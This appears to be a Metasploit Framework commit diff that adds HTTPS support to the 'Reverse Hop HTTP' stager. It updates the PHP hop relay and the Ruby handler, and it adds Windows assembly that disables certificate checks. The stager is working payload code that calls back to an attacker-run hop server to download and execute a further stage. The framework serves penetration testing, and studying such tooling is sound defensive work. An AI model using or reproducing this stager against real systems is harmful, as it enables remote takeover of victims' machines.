Land #6227, reverse_hop_http updates and HTTPS unification

bug/bundler_fix
Brent Cook 2015-11-23 06:29:15 -06:00
commit 5654b6b2e2
4 changed files with 75 additions and 14 deletions

View File

@ -45,7 +45,7 @@ if($url === "/control"){
//get data
$postdata = file_get_contents("php://input");
//See if we should send anything down
if($postdata === "RECV\x00"){
if($postdata === "RECV\x00" || $postdata === "RECV"){
findSendDelete($tempdir, "down_" . sha1($url));
$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
}else{

View File

@ -82,7 +82,8 @@ module ReverseHopHttp
uri.port,
{
'Msf' => framework
}
},
full_uri.start_with?('https')
)
@running = true # So we know we can stop it
# If someone is already monitoring this hop, bump the refcount instead of starting a new thread
@ -185,6 +186,19 @@ module ReverseHopHttp
lock.unlock
end
#
# Implemented for compatibility reasons
#
def resources
handlers
end
#
# Implemented for compatibility reasons, does nothing
#
def deref
end
#
# Implemented for compatibility reasons, does nothing
#
@ -250,7 +264,7 @@ module ReverseHopHttp
#
def send_new_stage(uri)
# try to get the UUID out of the existing URI
info = process_uri_resource(uri)
info = process_uri_resource(uri.to_s)
uuid = info[:uuid] || Msf::Payload::UUID.new
# generate a new connect
@ -258,11 +272,14 @@ module ReverseHopHttp
conn_id = generate_uri_uuid(sum, uuid)
conn_id = conn_id[1..-1] if conn_id.start_with? '/'
url = full_uri + conn_id + "/\x00"
fulluri = URI(full_uri + conn_id)
print_status("Preparing stage for next session #{conn_id}")
blob = stage_payload(
uuid: uuid,
uri: conn_id
uri: fulluri.request_uri,
lhost: uri.host,
lport: uri.port
)
#send up

View File

@ -55,8 +55,8 @@ module Msf::Payload::TransportConfig
{
:scheme => 'http',
:lhost => opts[:lhost],
:lport => opts[:lport].to_i,
:lhost => opts[:lhost] || datastore['LHOST'],
:lport => opts[:lport].to_i || datastore['LPORT'].to_i,
:uri => uri,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,

View File

@ -16,13 +16,14 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse Hop HTTP Stager',
'Name' => 'Reverse Hop HTTP/HTTPS Stager',
'Description' => %q{
Tunnel communication over an HTTP hop point. Note that you must first upload
Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload
data/hop/hop.php to the PHP server you wish to use as a hop.
},
'Author' => [
'scriptjunkie <scriptjunkie[at]scriptjunkie.us>',
'bannedit',
'hdm'
],
'License' => MSF_LICENSE,
@ -48,6 +49,15 @@ module Metasploit3
false
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
config = transport_config_reverse_http(opts)
config[:scheme] = URI(datastore['HOPURL']).scheme
config
end
#
# Generate the first stage
#
@ -188,12 +198,24 @@ httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
EOS
if uri.scheme == 'http'
payload_data << ' push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
else
payload_data << ' push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
end
# 0x80000000 | ; INTERNET_FLAG_RELOAD
# 0x00800000 | ; INTERNET_FLAG_SECURE
# 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
# 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
# 0x80000000 | ; INTERNET_FLAG_RELOAD
# 0x04000000 | ; INTERNET_NO_CACHE_WRITE
# 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
# 0x00000200 | ; INTERNET_FLAG_NO_UI
# 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
payload_data << <<EOS
push edx ; accept types
push edx ; referrer
push edx ; version
@ -223,6 +245,28 @@ httpsendrequest:
try_it_again:
dec ebx
jz failure
EOS
if uri.scheme == 'https'
payload_data << <<EOS
set_security_options:
push 0x00003380
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
mov eax, esp
push 0x04 ; sizeof(dwFlags)
push eax ; &dwFlags
push 0x1f ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
EOS
end
payload_data << <<EOS
jmp.i8 httpsendrequest
dbl_get_server_host: